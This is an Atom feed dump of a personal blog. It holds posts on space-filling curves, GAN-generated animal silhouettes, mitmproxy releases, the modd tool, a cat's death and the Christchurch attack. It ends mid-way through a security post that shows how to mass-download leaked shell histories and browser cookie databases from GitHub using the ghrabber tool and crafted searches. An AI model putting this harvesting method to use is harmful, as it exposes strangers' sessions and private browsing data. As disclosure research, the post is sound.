corte.si 2026-01-28T00:00:00+00:00 https://corte.si/atom.xml Spacecurve 2026-01-28T00:00:00+00:00 2026-01-28T00:00:00+00:00 https://corte.si/posts/spacecurve/announce/ <p>In 2024, I noticed that I'd let my blog languish. Since the issue was urgent, I made a firm new year's resolution to address the situation in 2025. Which is why, today, in January 2026, I'm writing this post.</p> <p>I've just released <a rel="external" href="https://github.com/cortesi/spacecurve">spacecurve</a>, a new just-for-fun space-filling curve project. It's the latest symptom of a long preoccupation with these beautiful mathematical objects. Over the years, this preoccupation yielded blog posts like <a href="/posts/visualisation/malware/">malware visualisations</a>, a <a href="/posts/code/hilbert/portrait/">portrait of the Hilbert curve</a> and tools like <a rel="external" href="https://binvis.io">binvis.io</a>. I have a long list of related ideas I never got to but have wanted to explore, and the first step is naturally to... rewrite it in Rust. This is just a starting point, a base for exploring ideas I have about visualisation, color spaces, and the qualities of the curves themselves.</p> <p>As part of the rewrite we now have fast base implementations of the curves themselves in the <a rel="external" href="https://crates.io/spacecurve">spacecurve</a> library, and a visual exploration tool for 2D and 3D curves in the <a rel="external" href="https://crates.io/crates/scurve">scurve</a> command-line tool. 
Thanks to <a rel="external" href="https://egui.rs">egui</a>, the visualiser runs both natively and in the browser.</p> <p>Click through on the images below to see the web version.</p> <div class="media-grid media-stack"> <div class="media media-frame"> <a href="&#x2F;spacecurve&#x2F;index.html"> <img src=".&#x2F;2d.png" alt="2D rendering of Spacecurve" /> </a> </div> </div> <div class="media-grid media-stack"> <div class="media media-frame"> <a href="&#x2F;spacecurve&#x2F;index.html"> <img src=".&#x2F;3d.png" alt="3D rendering of Spacecurve" /> </a> </div> </div> <h2 id="installation">Installation</h2> <p><strong>spacecurve</strong> is a Rust library for generating a variety of space-filling curves, including Hilbert, Peano, Sierpinski, Moore, and Z-order curves.</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">cargo</span><span style="color: #032F62;"> add spacecurve</span></span></code></pre> <p><strong>scurve</strong> is a command-line tool for generating and visualizing space-filling curves.</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">cargo</span><span style="color: #032F62;"> install scurve</span></span></code></pre> <p>It includes an egui interface for exploring the curves in 2D and 3D, which you can run like this:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;">scurve</span><span style="color: #032F62;"> gui</span></span></code></pre><h2 id="spacecurve-web">spacecurve web</h2> <p>Because egui supports webassembly, I've also deployed the egui app to the web. 
Access it by clicking below, or on any of the images above.</p> <p><a href="/spacecurve/index.html">Web Viewer</a></p> Generative zoology with neural networks 2020-06-30T00:00:00+00:00 2020-06-30T00:00:00+00:00 https://corte.si/posts/code/genzoo/ <p>A couple of years ago a paper titled <em><a rel="external" href="https://arxiv.org/pdf/1710.10196.pdf">Progressive Growing of GANs for Improved Quality, Stability, and Variation</a></em> cropped up on my reading list. It describes growing <a rel="external" href="https://en.wikipedia.org/wiki/Generative_adversarial_network">generative adversarial networks</a> progressively, starting with low-resolution images, and then building up more detail as training goes on. It got quite a bit of press at the time because the authors used their idea to generate realistic, unique images of human faces.</p> <div class="media"> <a href=".&#x2F;representative_image_512x256.png"> <img src=".&#x2F;representative_image_512x256.png" /> </a> <div class="subtitle"> Representative images from the <a href='https://github.com/tkarras/progressive_growing_of_gans'>Progressive GANs repo</a> </div> </div> <p>Looking at these images, it seems like the neural net would have to learn a vast number of things to be able to do what these networks were doing. Some of this seems relatively simple and factual - say, that eye colours should match. But other aspects are fantastically complex and hard to articulate. For instance, what nuances are needed to link the configuration of eyes, mouth and skin creases into a coherent facial expression? Of course, I'm anthropomorphising a statistical machine here, and we may be fooled by our intuition - it could turn out that there are relatively few working variations, and that the solution space is more constrained than we imagine. 
Maybe the most interesting thing is not the images themselves, but rather the uncanny effect they have on us.</p> <p>Some time later, a <a rel="external" href="http://tetzoo.com/podcast">favourite podcast of mine</a> mentioned <a rel="external" href="http://phylopic.org/">PhyloPic</a>, a database of silhouette images of animals, plants and other lifeforms. Musing along the lines above, I wondered what would result if you trained a system like the one in the <strong>Progressive GANs</strong> paper on a very diverse dataset of this sort. Would you just generate many variations of a few known animal types, or would there be enough variation to do neural-network driven <a rel="external" href="https://blogs.scientificamerican.com/tetrapod-zoology/speculative-zoology-a-discussion/">speculative zoology</a>? However things played out, I was pretty sure I would get a few good prints for my study wall out of it, so I set out to satisfy my curiosity with an attitude of open-minded experimentation.</p> <div class="media"> <a href=".&#x2F;animated.mp4"> <video autoplay loop muted playsinline src=".&#x2F;animated.mp4"></video> </a> <div class="subtitle"> Training from random noise to competence </div> </div> <p>I adapted the <a rel="external" href="https://github.com/tkarras/progressive_growing_of_gans">code from the progressive GANs paper</a>, and trained a model for 12000 iterations using a Google Cloud instance with 8 NVIDIA K80 GPUs over the complete PhyloPic dataset. Total training time, including some false starts and experiments, was 4 days. I used the final trained model to produce 50k individual images, and then spent hours poring over the results, categorising, filtering and collating images. I also did some light editing by flipping images to orient creatures in the same direction, because I found this a bit more visually satisfying. 
This hands-on approach means that what you see below is a sort of collaboration between me and the neural net - it did the creative work, and I edited.</p> <div class="media"> <a href="butterflies.png"> <img src=".&#x2F;butterflies-small.jpg" /> </a> <div class="subtitle"> Flying insects </div> </div> <p>The first surprising thing to me was how aesthetically pleasing the results were. Much of this is certainly a reflection of the good taste of the artists who produced the original data. However, there were also some happy accidents. For instance, it seems that whenever the neural net enters uncertain territory - whether it be fiddly bits that it hasn't quite mastered yet or complete flights of vaguely biological fantasy - chromatic aberrations begin to enter the picture. This is curious, because the input set is entirely in black and white, so colour cannot be a learned solution to some generative problem. Any colour must necessarily be a pure artefact of the mind of the machine. Delightfully, one of the things that consistently trigger chromatic aberrations is the wings of flying insects. This means that it generated hundreds and hundreds of variations of evocatively-coloured "butterflies" like the ones above. 
I wonder if this could be a useful observation - if you train using only black-and-white images, but demand output in full colour, splotches of colour might be a useful way to see where the model is still not able to accurately represent the training set.</p> <p>The bulk of the output is a huge variety of entirely recognisable silhouettes - birds, various quadrupeds, reams of little gracile theropod dinosaurs, sauropods, fish, bugs, arachnids and humanoids.</p> <div class="media"> <a href="birds.png"> <img src=".&#x2F;birds-small.jpg" /> </a> <div class="subtitle"> Birds </div> </div><div class="media"> <a href="quadrupeds.png"> <img src=".&#x2F;quadrupeds-small.jpg" /> </a> <div class="subtitle"> Quadrupeds </div> </div><div class="media"> <a href="dinos.png"> <img src=".&#x2F;dinos-small.jpg" /> </a> <div class="subtitle"> Dinosaurs </div> </div><div class="media"> <a href="fish.png"> <img src=".&#x2F;fish-small.jpg" /> </a> <div class="subtitle"> Fish </div> </div><div class="media"> <a href="bugs.png"> <img src=".&#x2F;bugs-small.jpg" /> </a> <div class="subtitle"> Bugs </div> </div><div class="media"> <a href="hominids.png"> <img src=".&#x2F;hominids-small.jpg" /> </a> <div class="subtitle"> Hominids </div> </div><h2 id="stranger-things">Stranger things</h2> <p>Once the known critters have been weeded out, we get to stranger things. One of the questions I had going into this was whether plausible animal body plans that don't exist in nature would emerge - perhaps hybrids of the creatures in the input set. 
Well, with careful search and a helpful touch of pareidolia, I found hundreds of quadrupedal birds, snake-headed deer and other fantastical monstrosities.</p> <div class="media"> <a href="mutants.png"> <img src=".&#x2F;mutants-small.jpg" /> </a> <div class="subtitle"> Monstrosities </div> </div> <p>Straying even further into the unknown, the model produced weird abstract patterns and unidentifiable entities, all with a vaguely biological, "life-ish" feel to them.</p> <div class="media"> <a href="fractals.png"> <img src=".&#x2F;fractals-small.jpg" /> </a> <div class="subtitle"> Abstract </div> </div><div class="media"> <a href="interesting.png"> <img src=".&#x2F;interesting-small.jpg" /> </a> <div class="subtitle"> Unidentifiable </div> </div><h2 id="a-random-sample">A random sample</h2> <p>What doesn't come through in the images above is the sheer abundance of variation in the results. I'm having a number of these image sets printed and framed, and the effect of hundreds of small, detailed images side by side at scale is quite striking. To give some idea of the scope of the full dataset, I'm including one of these prints below - this one is a random sample from the unfiltered corpus of images.</p> <div class="media"> <a href="large.png"> <img src=".&#x2F;large-small.jpg" /> </a> </div> Some personal thoughts on our national tragedy 2019-03-19T00:00:00+00:00 2019-03-19T00:00:00+00:00 https://corte.si/posts/personal/tragedy/ <div class="media"> <a href=".&#x2F;dunedin_mosque.jpg"> <img src=".&#x2F;dunedin_mosque.jpg" alt="Outside the Al Huda Mosque" /> </a> <div class="subtitle"> Outside the Al Huda Mosque near my home (by <a href=https://www.flickr.com/photos/mark_mcguire/46492088665>Mark McGuire</a>) </div> </div> <p>A year ago, my wife and I decided to become citizens of New Zealand. Both of our sons were born here and are full, native Kiwis. 
It felt odd for our family not to have this in common, and besides, our own connection with New Zealand had grown strong over the happy decade we'd lived here. It was time to take the plunge. Forms were filled in, interviews were held, and we were notified that our citizenship ceremony would be on the 8th of February, 2018.</p> <p>On the day, we were ushered into a hall with a podium and rows of slightly uncomfortable stackable chairs. By the time we arrived it was already full of our fellow soon-to-be Kiwis, along with their friends and family. Boisterous children resisted the shushing of their parents, and there was a bit of raucous running up and down the aisles. Nobody minded. The mood was friendly, expectant, and happy. We took our seats next to a young Chinese couple, and behind a family from the UK. Many were wearing splendid traditional dress from their countries of origin - Tongan, Chinese, Thai, Indian. I myself wore a business suit, something I only do under duress. The stiff posture and occasional collar-stretching finger of the man in front of me showed I wasn't alone. We were all there with common purpose - because we felt the need for a deeper commitment to our home, and perhaps a deeper sense of acceptance in turn.</p> <p>A dapper, splendid-mustached gentleman took his place at the podium, and the hall became silent. He began the kind of speech you would expect: a speech of welcome, about the rights and duties of citizenship, about the solemnity of the moment. It was at this point, in that stuffy hall, in the middle of a somewhat monotonous civil ceremony, that I was suddenly aware of a profound connection with the people around me. I felt, with complete clarity, a golden thread linking me to my wife, to the couple next to us, to the gent running the ceremony, extending outwards to everyone in the room. 
I felt the presence of generations of parents, stretching back in time, working to better the lives of their families, all their individual journeys leading us here, to this hall at this time. Most of all, I felt the presence of our children - all our children, the children in the room and my children, and their children, and their children's children, all joined, facing the unknowable future. This built to a sort of vision: a great, thronging, thrusting, golden river of humanity, meandering over a dark background. <em>All</em> of us together, everyone that has ever lived and everyone that ever will, shining ties binding us together each to each, all pushing ever forward in humanity's common project. For a moment between breaths, I was in touch with something transcendent, cosmically larger than me, yet something of which my own small fleck of personhood was a necessary part.</p> <p>Afterwards, people congregated in happy, smiling groups, shaking hands and hugging, having their first conversations as full citizens. I slipped out the door at the back of the hall. My wife, who knows me best, followed, holding my hand and laughing with kind-hearted amusement at how moist-eyed and emotional I was.</p> <p>That moment in the hall came back to me when I first read about the atrocity in Christchurch. I saw again the open, friendly, hopeful faces of my freshly-minted fellow citizens. I felt again the web of love that connects us all in fundamental unity. And I was suffused with an aching and overwhelming grief. Grief for the victims and their families, my countrymen and countrywomen. But grief also that anyone could have a conception of humanity so small, so narrow, and so mean as to lead to an act like this.</p> <p>In the coming weeks I'll be doing my part in the business of reckoning with our national tragedy, using the tools I have - code, data, and technology. We can do much with these, but we can't go all the way. 
The real work will be to look again at the human aspect of our online communities, which, it has become terrifyingly clear, have become an obstacle to recognising our common purpose.</p> mitmproxy v1.0.0: Christmas Edition 2016-12-26T00:00:00+00:00 2016-12-26T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce_1_0/ <div class="media"> <a href="http:&#x2F;&#x2F;mitmproxy.org"> <img src=".&#x2F;mitmweb_1_0.png" /> </a> </div> <p>Six years after mitmproxy's first checkin, we've finally released version 1.0.0 of the project. Our version numbering persisted below 1.0 well into the project's maturity, for reasons that are a tad difficult to explain. My mental model of software development is of an eternal pilgrimage - the roadmap of possible improvements stretches on forever, and we never quite reach a point where we look back and feel that we've arrived. From this perspective, it makes sense for 1.0 to always be out of reach. Rather than adopting more <a rel="external" href="http://www.tex.ac.uk/FAQ-TeXfuture.html">transcendental options</a>, I've stuck with simply incrementing the minor version with each release. This release sees two changes in our process. First, we're committing to a much more regular cadence, aiming for a new release every two months or so (with minor bugfix and patch releases in between). Second, each of these releases will see a major version number increment - this is v1.0, we'll release v2.0 by the end of February, and so forth. This retains something of the flavor of our previous eccentric version numbering strategy by de-emphasizing major version increments as flagfall events, without being as restrictive. Let the pilgrimage continue.</p> <p>The project's momentum continues to be excellent - since the last release, we've had 459 commits by 10 contributors, resulting in 104 closed issues and 172 closed PRs, all in just over 70 days. 
All this activity has resulted in a number of very significant developments.</p> <p>Over the last year, we've done a huge amount of work converting the project from Python 2 to Python 3. Our previous release straddled the two versions, retaining compatibility with Python 2.7. This release is strictly Python3-only. We are now well positioned to take full advantage of things like optional type checking, the new asyncio module and the many small and large interface improvements that Python 3 brings.</p> <p>Our user interfaces continue to improve by leaps and bounds. The console interface now has a much cleaner core, sports a number of new features like flow ordering, and has seen significant speed improvements. We're also finally releasing something we've been cooking up for quite a while - mitmweb, a web interface to mitmproxy. It doesn't have feature parity with the console tool yet, but we feel it's ready to step onto the stage as one of our primary interfaces. Since mitmproxy console doesn't run on Windows (yet), mitmweb is the best GUI option for our Windows users for now. We're also improving our distribution mechanisms on Windows, with a new installer package kindly provided by <a rel="external" href="http://bitrock.com/">BitRock</a>. These two developments together mean much better support for our Windows users.</p> <p>At a protocol level, we're happy to announce that our support for Websockets is now mature, and enabled by default. For the moment, the best way to interact with Websockets traffic is to use our scripting mechanism - we will have support in the GUIs very soon. On the HTTP/2 front, the news is mixed. We're very happy with the quality of our own implementation of the protocol, but we've discovered that some server implementations still have problems with certain protocol edge cases. Over the last few months we found multiple bugs affecting some very prominent websites and CDNs. 
We are working closely with the affected companies to get these issues fixed - but big wheels turn slowly, especially when it comes to business-critical infrastructure, and all the needed repairs haven't been rolled out yet. This has left us in a bit of a quandary - we know that fixes for these issues are imminent, and we believe that the particular problems are idiosyncratic and shouldn't prompt a redevelopment of our core to make us bug-for-bug compatible. None the less, the effect is that mitmproxy's HTTP/2 implementation will currently do unexpected things when talking to large sites like Twitter and Reddit. We've decided to disable HTTP/2 by default for this release - you can explicitly re-enable it using the <em>--http2</em> flag.</p> <p>Finally, if you're interested in hacking on mitmproxy, now is an excellent time to join us. Contributing is simple - pick one of the issues that we've tagged as <a rel="external" href="https://github.com/mitmproxy/mitmproxy/issues?q=is%3Aissue+is%3Aopen+label%3Agood-first-contribution">good first contributions</a>, join us on <a rel="external" href="https://slack.mitmproxy.org/">Slack</a> to discuss your approach, and then send a PR.</p> <h2 id="changelog">Changelog</h2> <ul> <li>All mitmproxy tools are now Python 3 only! We plan to support Python 3.5 and higher.</li> <li>Web-Based User Interface: Mitmproxy now officially has a web-based user interface called mitmweb. We consider it stable for all features currently exposed in the UI, but it still misses a lot of mitmproxy’s options.</li> <li>Windows Compatibility: With mitmweb, mitmproxy is now useable on Windows. We are also introducing an installer (kindly sponsored by BitRock) that simplifies setup.</li> <li>Configuration: The config file format is now a single YAML file. 
In most cases, converting to the new format should be trivial - please see the docs for more information.</li> <li>Console: Significant UI improvements - including sorting of flows by size, type and url, status bar improvements, much faster indentation for HTTP views, and more.</li> <li>HTTP/2: Significant improvements, but is temporarily disabled by default due to widespread protocol implementation errors on some large websites.</li> <li>WebSocket: The protocol implementation is now mature, and is enabled by default. Complete UI support is coming in the next release. Hooks for message interception and manipulation are available.</li> <li>A myriad of other small improvements throughout the project.</li> </ul> mitmproxy v0.18 2016-10-17T00:00:00+00:00 2016-10-17T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce_0_18/ <p>We've just released <a rel="external" href="https://github.com/mitmproxy/mitmproxy/releases/tag/v0.18.1">mitmproxy v0.18</a>! Since the last release, the project has had 1399 commits by 40 contributors, resulting in 217 closed issues and 305 closed PRs, all of this in just over 189 days.</p> <p>This release is notable for a number of reasons.</p> <p>First, it contains significant contributions from our three excellent <a rel="external" href="https://developers.google.com/open-source/gsoc/">GSOC</a> students this year. Shadab Zafar worked on Python 3 compatibility and a number of aspects of mitmproxy's core. Clemens Brunner and Jason Hao made major improvements to mitmweb, the upcoming web-based interface to mitmproxy. We loved working with these guys, and hope that they will continue to hack on mitmproxy.</p> <p>Second, the project has seen some significant internal reorganisation. Previously, we were split over three separate repositories (mitmproxy, netlib and pathod). Over time, the practical headaches of keeping everything synchronised started taking a toll, and we decided to amalgamate it all in a single repo. 
The most immediate external effect is that installing mitmproxy (through, say, "pip install mitmproxy") now gets you all of the associated tools and libraries, including pathod and pathoc.</p> <p>Finally, 0.18 will be the last major version of mitmproxy compatible with Python 2. The next release will target Python 3.5 only, with all of the 2/3 compatibility cruft stripped out. This is not a decision we took lightly - we have a significant community of developers that have tools based on mitmproxy, and we realise this might be painful for some of them. We feel that being able to use the full features of Python 3.5 will make the transition worth it. If you have a library or tool based on mitmproxy, you should start planning for a conversion now. We'd be very happy to help you navigate the transition, so feel free to drop by the <a rel="external" href="https://slack.mitmproxy.org/">Slack channel</a> to chat to the dev team.</p> <h2 id="changelog">Changelog</h2> <ul> <li>Python 3 Compatibility for mitmproxy and pathod (Shadab Zafar, GSoC 2016)</li> <li>Major improvements to mitmweb (Clemens Brunner &amp; Jason Hao, GSoC 2016)</li> <li>Internal Core Refactor: Separation of most features into isolated Addons</li> <li>Initial Support for WebSockets</li> <li>Improved HTTP/2 Support</li> <li>Reverse Proxy Mode now automatically adjusts host headers and TLS Server Name Indication</li> <li>Improved HAR export</li> <li>Improved export functionality for curl, python code, raw http etc.</li> <li>Flow URLs are now truncated in the console for better visibility</li> <li>New filters for TCP, HTTP and marked flows.</li> <li>Mitmproxy now handles comma-separated Cookie headers</li> <li>Merge mitmproxy and pathod documentation</li> <li>Mitmdump now sanitizes its console output to not include control characters</li> <li>Improved message body handling for HTTP messages: <ul> <li>.raw_content provides the message body as seen on the wire</li> <li>.content provides the decompressed body 
(e.g. un-gzipped)</li> <li>.text provides the decompressed and decoded body</li> </ul> </li> <li>New HTTP Message getters/setters for cookies and form contents.</li> <li>Add ability to view only marked flows in mitmproxy</li> <li>Improved Script Reloader (Always use polling, watch for whole directory)</li> <li>Use tox for testing</li> <li>Unicode support for tnetstrings</li> <li>Add dumpfile converters for mitmproxy versions 0.11 and 0.12</li> <li>Numerous bugfixes</li> </ul> <h2 id="contributors-for-this-release">Contributors for this release</h2> <ul> <li>Aldo Cortesi</li> <li>Angelo Agatino Nicolosi</li> <li>BSalita</li> <li>Brett Randall</li> <li>Christian Frichot</li> <li>Clemens Brunner</li> <li>Cory Benfield</li> <li>Doug Freed</li> <li>Drake Caraker</li> <li>Felix Yan</li> <li>Israel Blancas</li> <li>Jason</li> <li>Jason Pepas</li> <li>Jonathan Jones</li> <li>Kostya Esmukov</li> <li>Linmiao Xu</li> <li>Manish Kumar</li> <li>Maximilian Hils</li> <li>Ryan Laughlin</li> <li>Sachin Kelkar</li> <li>Sanchit Sokhey</li> <li>Schamper</li> <li>Shadab Zafar</li> <li>Steven Noble</li> <li>Steven Van Acker</li> <li>Tai Dickerson</li> <li>Thomas Kriechbaumer</li> <li>Tyler St. Onge</li> <li>Vincent Haupert</li> <li>Wes Turner</li> <li>Yoginski</li> <li>Zohar Lorberbaum</li> <li>arjun</li> <li>chhsiao</li> <li>jpkrause</li> <li>phackt</li> <li>redfast</li> <li>smill</li> <li>strohu</li> <li>vulnminer</li> </ul> Hobbes 2016-03-22T00:00:00+00:00 2016-03-22T00:00:00+00:00 https://corte.si/posts/personal/hobbes/ <div class="media"> <a href=".&#x2F;hobbes.jpg"> <img src=".&#x2F;hobbes.jpg" /> </a> </div> <p>Eight years ago my wife and I walked into the <a rel="external" href="https://www.catprotection.org.au/">Cat Protection Society</a> near our house in Sydney on a whim - just to look, we assured each other, and <em>most definitely</em> not to get another cat. 
Thirty minutes later we emerged with a box containing a tiny ball of scraggly orange fluff, a wee kitten we immediately named Hobbes. Circumstances had taken Hobbes away from his mother far too early, and since I was able to work from home at the time the job of playing surrogate largely fell to me. I fed him, let him perch on my shoulder like a fluffy little malodorous parrot while I worked, and cleaned him with a cotton bud after his inept attempts to use the litter tray. He grew from a tiny scrap to a mischievous and energetic kitten, and then to a somewhat slothful but very handsome boy. Perhaps because he came to us so young, Hobbes never got on with other cats. He preferred the company of humans, and considered himself to be as much of a person as anyone else. The photo above is him in his natural habitat: draped bonelessly over my lap like a purring orange throw-rug, just being part of whatever conversation his humans are having.</p> <p>About a year ago, Hobbes started losing weight. Truth be told shedding a few pounds would probably have done him good, but this was unexplained by any change in his diet. After a series of X-rays and a biopsy we got bad news: he had lymphoma. With chemotherapy he would have a year or so of high-quality life left, but likely not much more. Apart from giving him his daily pills, there was not much we could do. We treated him to his favorite food as often as seemed sensible, and watched carefully for the moment when the scales tipped and discomfort outweighed the joy in his life.</p> <p>This morning Zoe and I took Hobbes to the vet one last time. He always hated being in the cat carrier, and would pace, tense and wide-eyed, ready to spring out like a jack-in-the-box when we opened the door. Today, he just seemed tired and sore, huddled motionlessly in an uncomfortable-looking crouch. We held him together as the vet gave him two injections - one to send him gently to sleep, and shortly after, another to stop his heart. 
Afterwards we brought him home and buried him under a cherry tree in our garden. Perhaps when spring comes, it will flower orange.</p> <p>Goodbye, Hobbesy. Your family will miss you. You were a good, good boy.</p> modd: a flexible tool for responding to filesystem change 2016-02-11T00:00:00+00:00 2016-02-11T00:00:00+00:00 https://corte.si/posts/modd/announce/ <p>I've just released <a rel="external" href="https://github.com/cortesi/modd">modd</a>, a new<sup class="footnote-reference"><a href="#1">1</a></sup> project of mine. Like its sister project <a rel="external" href="https://github.com/cortesi/devd">devd</a>, it's distributed as a single, self-contained binary for all major platforms - <a rel="external" href="https://github.com/cortesi/modd/releases">get it while it's fresh</a>.</p> <p>Modd is a simple tool that's hard to explain pithily. It triggers commands and manages daemons in response to filesystem changes - but that is a technically-correct mouthful that doesn't really convey how it is used. Part of the problem is that it is extremely flexible. In my projects it runs linters, does live code compiles, manages infrastructure daemons like databases, runs test instances of projects and is even rendering and live-reloading this blog post as I type. Modd replaces parts of tools like <a rel="external" href="http://gulpjs.com/">Gulp</a>, <a rel="external" href="http://gruntjs.com/">Grunt</a>, <a rel="external" href="https://ddollar.github.io/foreman/">Foreman</a> and <em>make</em>, but it can also augment them. For instance, one of my projects is entirely driven by a Makefile, with tasks invoked by modd on change.</p> <p>At modd's core is a file change detection library that tries to get things right for most developer work patterns. It handles temporary files, VCS directories and many <a rel="external" href="https://twitter.com/cortesi/status/661316050542329856">pathological behaviors shown by common editors</a> correctly (or at least tries really hard to). 
The change detection algorithm waits for a lull in activity, so that jobs aren't triggered in the middle of progressive processes like renders and compiles that may touch many files. The result is change detection that is less surprising and more consistent than similar projects out there. The output of the change detection algorithm is then hooked up to a very flexible way to specify commands and manage daemons, letting you specify shell scripts that trigger on file match patterns in a single config file. Finally, there are a few mod-cons. A custom <a rel="external" href="https://github.com/cortesi/termlog">terminal logging module</a> lets modd sensibly interleave the output of possibly concurrent daemons and commands, with headings showing which command was responsible for what. Modd also has support for desktop notifications (<a rel="external" href="http://growl.info/">Growl</a> on OSX, <a rel="external" href="https://developer.gnome.org/libnotify/">libnotify</a> on Linux), letting you see things like linter output and compile errors immediately.</p> <p>Below, I'm going to show one quick example of how I use modd to do a live build/compile cycle for <a rel="external" href="https://github.com/cortesi/devd">devd</a>, a pretty standard Go project. In a future post, I'll show how I've replaced Gulp entirely for a Javascript-heavy front-end project.</p> <p>Please see the <a rel="external" href="https://github.com/cortesi/modd">modd documentation</a> for a complete explanation of the syntax and for more examples.</p> <h2 id="test-compile-cycle-for-go">Test-compile cycle for Go</h2> <p>On startup, modd looks for a file called <em>modd.conf</em> in the current directory. This file has a simple but powerful syntax - one or more blocks of commands, each of which can be triggered on changes to files matching a set of file patterns. Commands have two flavors: <strong>prep</strong> commands that run and terminate (e.g. 
compiling, running test suites or running linters), and <strong>daemon</strong> commands that run and keep running (e.g. databases or webservers). Daemons are restarted when their block is triggered, after all prep commands have run successfully. Commands are embedded shell scripts, so shell features like redirection work, and compound, multi-step commands are common.</p> <p>Here is the simple <strong>modd.conf</strong> I use to drive the test cycle for <a rel="external" href="https://github.com/cortesi/devd">devd</a>:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="plain"><span class="giallo-l"><span>**/*.go {</span></span> <span class="giallo-l"><span> prep: go test @dirmods</span></span> <span class="giallo-l"><span>}</span></span> <span class="giallo-l"></span> <span class="giallo-l"><span>**/*.go !**/*_test.go {</span></span> <span class="giallo-l"><span> prep: go install ./cmd/devd</span></span> <span class="giallo-l"><span> daemon +sigterm: devd -ml ./tmp</span></span> <span class="giallo-l"><span>}</span></span></code></pre> <p>When you run the <em>modd</em> command, the commands execute for the first time, and modd is then ready to respond to changes. The initial output looks like this:</p> <div class="media"> <a href="modd-devd.png"> <img src="modd-devd.png" /> </a> </div> <p>The config file does three things:</p> <ul> <li>When any .go file changes, it runs "go test" on the affected module.</li> <li>When a non-test file changes, it compiles and installs devd.</li> <li>It keeps a test instance of the devd daemon running, and restarts it with a SIGTERM when needed.</li> </ul> <p>The one subtlety here is the <strong>@dirmods</strong> tag, which is replaced with a shell-escaped list of all directories that contain modified files. There's a similar tag - <strong>@mods</strong> - that is replaced with all matching modified files.
When first run, both of these tags are replaced by all possible matches - that is, all directories containing matching files, and all matching files respectively. This means that the test suite for all the Go modules in the project is run on startup, and only for modified modules after that.</p> <div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup> <p>In fact, this is <a rel="external" href="https://github.com/cortesi/modd/blob/master/CHANGELOG.md">release v0.2</a>, which slipped in before I had time to announce v0.1 on my blog.</p> </div> mitmproxy v0.15 2015-12-04T00:00:00+00:00 2015-12-04T00:00:00+00:00 https://corte.si/posts/code/mitmproxy/announce_0_15/ <div class="media"> <a href="http:&#x2F;&#x2F;mitmproxy.org"> <img src="..&#x2F;announce_0_12_1&#x2F;mitmproxy_0_12_1.gif" /> </a> </div> <p>We've just released <a rel="external" href="http://www.mitmproxy.org">mitmproxy 0.15</a>. This is primarily a bugfix release, but with a few really juicy long-demanded features thrown in:</p> <ul> <li>Support for loading and converting older dumpfile formats (0.13 and up)</li> <li>Content views for inline script (@chrisczub)</li> <li>Better handling of empty header values (Benjamin Lee/@bltb)</li> <li>Fix a gnarly memory leak in mitmdump</li> <li>A number of bugfixes and small improvements</li> </ul> <p>Behind the scenes, there has been a bunch of other exciting developments. The effort to port mitmproxy and its underlying libraries to Python3 continues apace. 
Our automated build and testing infrastructure has improved hugely - we now have <a rel="external" href="http://snapshots.mitmproxy.org">up-to-date binary snapshots built for each commit</a>.</p> <p>Thanks to all the contributors who helped get this release out the door, and, as usual, special thanks to my invaluable co-maintainer <a rel="external" href="https://maximilianhils.com/">Max</a>, who's been steering things while I've been kept busy with other things.</p> Trawling Github for cookies, bookmarks and browsing history 2015-11-26T00:00:00+00:00 2015-11-26T00:00:00+00:00 https://corte.si/posts/hacks/github-browserstate/ <p>It's a universal rule that search over a sufficiently large body of user data poses security challenges. This follows naturally from the fact that humans - even smart, informed, careful humans - occasionally slip up. Given enough data, and the ability to pick out slip-ups with search, there will always be rich pickings for a malefactor. I wrote a short series of posts a while ago about interesting things I found on Github - <a href="https://corte.si/posts/hacks/github-shhistory/">commands from shell history files</a>, <a href="https://corte.si/posts/hacks/github-pipechains/">common pipe chains</a>, and words from <a href="https://corte.si/posts/hacks/github-spellingdicts/">custom spell-check dictionaries</a>. While shell history files could definitely contain very sensitive information, in practice there were only a handful of really damaging issues in the dataset. Trawling around people's dotfile directories, I found that something much more damaging often made it into repos: browser state. It's easy to see how this could happen - it takes just one injudicious add of a hidden directory to expose cookies, browser history, bookmarks and more. 
I decided to return to this issue later, and it slipped off my radar until recently.</p> <p>When I wrote the first series of posts, I also released a <a rel="external" href="https://github.com/cortesi/ghrabber">tiny tool called ghrabber</a> (just a hack, really) that lets you grab files from Github en masse using a Github code search query. The first thing I noticed when I picked it up again is that it no longer worked as expected. I used to be able to retrieve all files matching a path, like so:</p> <pre class="giallo" style="color: #24292E; background-color: #FFFFFF;"><code data-lang="shellscript"><span class="giallo-l"><span style="color: #6F42C1;"> ghrabber.py</span><span style="color: #032F62;"> &quot;path:.bash_history&quot;</span></span></code></pre> <p>Today, this returns an error - Github now requires you to specify both a search term <strong>and</strong> a path<sup class="footnote-reference"><a href="#1">1</a></sup>. There are all sorts of possible explanations for this change, but I like to think that it's meant to prevent (or at least impede) exactly the kind of trawling I've been amusing myself with.</p> <p>Let's say we want to search for Firefox browser profile cookies. These are stored in a SQLite file called "cookies.sqlite". Github doesn't index binary files for search, so we can't search for characteristic content in the file. Path specification is broken, so we can't search for the filename. Stumped, right? Not so fast - the cookie files live in a directory with a large number of associated non-binary files. If we could come up with a signature for one of these accompanying files, then we could download a path relative to the match to retrieve the cookie storage file itself. I quickly <a rel="external" href="https://github.com/cortesi/ghrabber/commit/9b7909ccd594168ab8eb3d44834055b510e90273">added a flag to do exactly this to ghrabber</a>, and cooked up appropriate query strings to detect Firefox and Chrome browser profiles.
